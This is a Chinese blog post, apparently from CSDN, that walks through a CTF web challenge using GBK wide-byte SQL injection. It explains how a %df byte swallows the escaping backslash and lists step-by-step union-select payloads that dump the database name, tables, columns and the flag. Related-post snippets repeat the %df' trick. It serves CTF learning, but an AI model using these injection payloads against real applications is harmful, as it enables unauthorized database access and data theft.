CG CTF -- GBK Injection

最新推荐文章于 2022-10-24 22:03:41 发布
最新推荐文章于 2022-10-24 22:03:41 发布
阅读量174 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40860153/article/details/108725387
版权

宽字节注入:

原理:输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的 %df \ 变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符。

拿到题目,根据题目判断应该是宽字节注入,先输入 ’ 试试

在这里插入图片描述

看到 \ 转义了输入的单引号,此时在加入%df进行尝试

在这里插入图片描述

报错了,应该是过滤了# ,那么可以换成%23试试

在这里插入图片描述

OK,那么现在就可以正常进行sql注入了,使用order by 来测试

order by 3

3报错

3报错,2正常

order by 2
在这里插入图片描述

查询当前数据库

union select 1,database() %23

在这里插入图片描述

查询表名,但是题目对单引号有转义,所以可以将sae-chinalover转换成16进制 即:7361652d6368696e616c6f766572

union select 1,(select group_concat(table_name) from information_schema.tables where= table_schema=0x7361652d6368696e616c6f766572)%23
在这里插入图片描述

进行尝试,发现flag在ctf4里面

union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x63746634)%23
在这里插入图片描述

union select 1,(select flag from ctf4) %23
在这里插入图片描述

判断是否为宽字节注入也可以使用两个%df进行测试

一个%df 报错:

在这里插入图片描述

两个%df正常:

在这里插入图片描述

HelloYo_k
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CG-CTF GBK Injection
venu_s的博客
11-03 335
CG-CTF WEB GBK Injection
宽字节注入
weixin_53026460的博客
11-07 1408
但是编码不同就会产生歧义,比如说编码a和编码b,组合在一起的时候可能形成某一个汉字,如果编码a、b、c三个字符在一起,去编码的时候,用不同的编码去看待它是不一样的东西;举个例子,有句话叫:下雨天留人天留我不留,我们可以通过断句的不同来决定这句话的涵义;编码也是一样的,也有标点符号的问题,比如说原本是普通的英文编码,假设a、b、c、d这是四个单独的字符,但是呢现在这个英文编码传过去之后用中文去解,这个时候它可能会被解码出其他的东西。所以说不同的编码会造成不同的状态;
宽字节注入%df的理解
tpaer的博客
10-24 5080
关于%df宽字节注入的理解
宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))
T1ngSh0w的博客
09-18 4937
宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
My-CTF-Challenges
05-16
【标题】"我的CTF挑战"是一个集合,包含了一系列网络安全竞赛中的挑战,旨在提升参赛者在信息安全领域的技能和知识。这个挑战集可能是为一个名为"周大福"的活动或组织设计的。其中的一个具体挑战是"TCTF2018_决赛",...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
Web安全——sql注入
weixin_48888525的博客
10-22 3470
由于我的博客是学到渗透的时候才做的,没有关于WEB漏洞的笔记,现在发现WEB层面的漏洞有些不太熟悉了,边写一下笔记边复习一下,就从sql注入开始吧 话不多说先上表,基本常用的手工注入函数解释都在这 union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information
sql注释符注入防御_SQL注入防御绕过的一些沉淀
weixin_39620535的博客
12-20 276
一、宽字节注入1、什么是宽字节GB2312、GBK、GB18030、BIG5等这些都是常说的宽字节,实际为两字节2、宽字节注入原理防御:将 ' 转换为 \'绕过:将 \ 消灭mysql在使用GBK编码的时候,会认为两个字符为一个汉字\ 编码为 %5c' 编码为%27%df%5c mysql会认为是一个汉字构造:%df' %df\' %df%5c%27 其中%df%5c将成为一个汉字专为 ...
CG CTF-Web-GBK Injection
feng的博客
09-06 238
WP 由题目可知,这是一道宽字节注入的题目,就是不知道具体的题目是只进行宽字节的绕过即可还是里面还会过滤其他的字符。 宽字节注入的原理其实简单概括来就是:数据库编码为GBK时,加%df再加单引号,单引号转义出的反斜杠编码为%5c,在GBK编码中,%df%5c是繁体字,这时单引号成功逃逸。 首先打开题目,如下: 发现注入点是’1’。直接注入1’ --+会发现单引号被转义了,因此可以试试宽字节注入。 ?id=1%df' and 1=1 --+ 发现注入成功,之后就是正常的union注入方式。 ?id=1%
宽字节注入入门详解
爱党人士
05-11 4399
原理: GBK 占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。 大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等), 单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C , 那么现在 %df\’ =%df%5c%27, 如果程序的默认...
【漏洞挖掘】——22、DDE漏洞攻击介绍
Fly_鹏程万里
03-03 1300
2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估。
mysql宽字节数_sql宽字节简介
weixin_36380063的博客
02-08 214
宽字节注入其实在SQL注入是一个比较常见的注入,但是有时候很长时间没有遇到宽字节注入,突然出现了一个宽字节注入,就是返回去翻资料,还不如自己写篇文章记录一下。宽字节的注入,sqlmap也是无法识别出来的。需要说明的是,本文的资料主要是来自于P神的浅析白盒审计中的字符编码及SQL注入,只是对其中内容稍有修改。简介在将sql宽字节注入之前,需要对字符编码有所了解,常见的gbk、utf-8、unicod...
sql注入_1-8_宽字节注入
weixin_44110913的博客
12-11 657
文章目录一.sql_宽字节注入概念二.sql_宽字节注入源码分析三.sql_宽字节注入演示四.sql_宽字节注入总结 一.sql_宽字节注入概念 1.了解宽字节注入前,必须先了解字符集编码:点击这里 2.gbk占用两个字节,ascll占用一个字节,php编码为gbk, 函数执行添加的是ascll编码, mysql默认字符集是gbk等宽字节字符集。 %DF’ :会被PHP当中的addslashes函...
宽字节(宽字符)注入
Yatere的天平秤
04-24 2013
宽字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠/,变成了 %df/’,其中/的十六进制是 %5C ,那么现在 %df/’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df/’ = %df%5c%27=縗’,有了单引号就好注入了。比如:$conn = mysql_connect(”localho
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值